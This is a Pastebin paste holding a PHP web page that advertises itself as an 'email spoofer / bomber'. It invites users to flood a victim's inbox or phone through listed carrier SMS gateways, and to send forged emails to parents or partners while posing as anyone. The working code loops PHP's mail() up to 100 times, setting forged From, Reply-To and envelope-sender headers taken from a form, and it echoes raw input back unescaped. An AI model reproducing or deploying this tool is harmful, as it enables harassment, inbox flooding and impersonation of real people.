Advertisement
Guest User

Untitled

a guest
Jun 11th, 2017
581
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.68 KB | None | 0 0
  1. <p><font size="4"><strong>Welcome to the email spoofer / bomber brought to you by Chasebadkids!</strong></font></p>
  2. <p><font size="2">Hello, If you have this link apparently I like you and trust you =]<br>
  3. Anyways lets cut to the facts, with this little thing you can </font></p>
  4. <p><font size="2">1) Spam someones inbox full of dirty emails from whatever e-mail you want!
  5. <br>
  6. or
  7. <br>
  8. 2) Send Spoofed emails, to say, your parents, boyfriend/girlfriend, pretending to be whoever you want, saying whatever you want!</font></p>
  9. <p><font size="2">Cellphones:</font></p>
  10. <p>T-Mobile: phonenumber@tmomail.net <br />
  11. Virgin Mobile: phonenumber@vmobl.com <br />
  12. Cingular: phonenumber@cingularme.com <br />
  13. Sprint: phonenumber@messaging.sprintpcs.com <br />
  14. Verizon: phonenumber@vtext.com <br />
  15. Nextel: phonenumber@messaging.nextel.com <br />
  16. <br />
  17. where phonenumber = your 10 digit phone number </p>
  18. <form method="post" action="<?php echo $_SERVER['PHP_SELF']?>">
  19. <p><font size="2"><strong>Victims Email Address</strong>:
  20. <input type="text" name="add">
  21. *<br>
  22. <strong>Yours, Or Spoofed Address</strong>:
  23. <input type="text" name="ysa">
  24. <br>
  25. <strong>Subject</strong>:
  26. <input type="text" name="subj">
  27. *<br>
  28. <strong>Message</strong>:<br>
  29. </font><font size="2">
  30. <textarea name="mess" cols="60" rows="10"></textarea>
  31. *<br>
  32. <strong>Number Of Emails</strong>:
  33. <input type="text" name="num">
  34. *<br>
  35. </font></p>
  36. <table width="37">
  37. <td width="169"><font size="2">
  38. <input type="Submit" value="Go">
  39. </font></td>
  40. </table>
  41. </form>
  42. <p><font size="2">* marks a <b>required</b> field.</font> </p>
  43. <p><font size="2">
  44. <?php
  45.  
  46. if (isset($_POST['num'])) {
  47. echo "Request Accepted!";
  48.  
  49.  
  50.  
  51.  
  52.  
  53. $emails = $_POST['num']; //set this to how many emails to send
  54. if ($emails > 101) { $emails = 100; } //so server doesnt overload
  55. $address = $_POST['add']; //set this to the person
  56. $fake = $_POST['ysa']; //fake email address
  57. $randomsubjects = rand(0,99); //random number
  58. $subject1 = $_POST['subj']; //Set this to your subject
  59. $subject = $subject1 . $randomsubjects; //supposed to put random number in subject
  60. $message = $_POST['mess']; //Set this to your message
  61. $sleep = 0; //(set this to a number (of seconds) if you'd like a space between all the email bombs)
  62. $num = $_POST['num'];
  63. $add = $_POST['add'];
  64. $ysa = $_POST['ysa'];
  65. $subj = $_POST['subj'];
  66. $mess = $_POST['mess'];
  67.  
  68.  
  69. //leave the code below this:
  70. $headers = 'From:' . $fake . "\r\n" . 'Reply-To: ' . $fake;
  71.  
  72. for($i = 0; $i < $emails; $i++)
  73. {
  74. mail($address, $subject, $message, $headers, '-f ' . $fake);
  75.  
  76. if($sleep)
  77. {
  78. sleep($sleep);
  79. }
  80. }
  81. ?>
  82. <br />
  83. </font><font size="2"><b>Details:</b><br>
  84. Number of Emails Sent: <font color="red"><? echo $num; ?></font><br>
  85. Victims Email Address: <font color="red"><? echo $add; ?></font><br>
  86. Your fake Address: <font color="red"><? echo $ysa; ?></font><br>
  87. Subject: <font color="red"><? echo $subj; ?></font><br>
  88. Message: <font color="red"><? echo $mess; ?></font><br>
  89. </font>
  90. <? } ?>
  91. <style type="text/css">
  92. body{
  93. background-color:rgb(12,4,64);
  94. }
  95. img{
  96. border:0;
  97. }
  98. td, tr, div{
  99. background-color:transparent;
  100. border:0;
  101. }
  102. table{
  103. background-color:transparent;
  104. border:0;
  105. }
  106. table table{
  107. background-color:transparent;
  108. border:0;
  109. }
  110. table table table{
  111. background-color:rgb(0,47,112);
  112. border-width:4;
  113. border-color:rgb(255,255,255);
  114. border-style:solid;
  115. }
  116. table table table td{
  117. border:0;
  118. }
  119. table table table table{
  120. background-color:rgb(0,47,112);
  121. border:0;
  122. }
  123. body, div, span, td, p, .lightbluetext8, strong, b, u, .redtext, .redbtext, .btext, .text, .blacktext10, .blacktext12 {
  124. font-family:Arial;
  125. font-size:12px;
  126. color:rgb(255,255,255);
  127. font-weight:normal;
  128. }
  129. .nametext{
  130. font-family:Trebuchet MS;
  131. font-size:22px;
  132. color:rgb(255,255,255);
  133. font-weight:bold;
  134. }
  135. .whitetext12, .orangetext15{
  136. font-family:Arial;
  137. font-size:16px;
  138. color:rgb(103,1,3);
  139. font-weight:bold;
  140. }
  141. a.navbar:link, a.navbar:active, a.navbar:visited, a.navbar:hover, a.man:link, a.man:active, a.man:visited, a.man:hover, a, a:link, a:active, a:visited, a:hover, a.navbar:link, a.navbar:active, a.navbar:visited, a.navbar:hover, a.text:link, a.text:active, a.text:visited, a.text:hover, a.searchlinksmall:link, a.searchlinksmall:active, a.searchlinksmall:visited, a.searchlinksmall:hover, a.redlink:link, a.redlink:active, a.redlink:visited, a.redlink:hover {
  142. color:rgb(30,180,101);
  143. font-weight:bold;
  144. }
  145. a.navbar:hover, a.man:hover, a:hover {
  146. color:rgb(6,105,37);
  147. font-weight:bold;
  148. text-decoration:underline;
  149. }
  150. </style>
  151. </p>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement